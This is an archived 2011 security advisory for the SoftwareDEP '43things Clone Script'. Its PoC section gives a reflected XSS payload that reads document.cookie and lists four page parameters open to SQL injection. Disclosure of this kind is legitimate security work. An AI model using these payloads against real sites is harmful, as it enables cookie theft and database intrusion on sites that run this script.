SoftwareDEP 43things Clone Script Multiple Vulnerabilities

Published
Credit
Risk
2011.08.19
v3n0m
Low
CWE
CVE
Local
Remote
N/A
N/A
No
Yes

-----------------------------------------------------------------------
SoftwareDEP 43things Clone Script Multiple Vulnerabilities

Author : v3n0m
Discovered : August, 18-2011 GMT +7:00 Jakarta, Indonesia
Software : 43things Clone script
Developer : http://www.softwaredep.com/
Price : $700
Version : v2 Lower versions may also be affected
-----------------------------------------------------------------------

PoC:
---

XSS Injection:
-------------
http://www.domain.tld/[path]/zeitgeist/tag_list.php?tag=<script>alert(document.cookie)</script>

SQL Injection:
-------------
http://www.domain.tld/[path]/thing_detail.php?thingid=[SQLi]
http://www.domain.tld/[path]/thingshome.php?uid=[SQLi]
http://www.domain.tld/[path]/recent_activity.php?uid=[SQLi]
http://www.domain.tld/[path]/year_in_review.php?uid=[SQLi]

Credits:
-------
www.yogyacarderlink.web.id - irc.yogyacarderlink.web.id


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com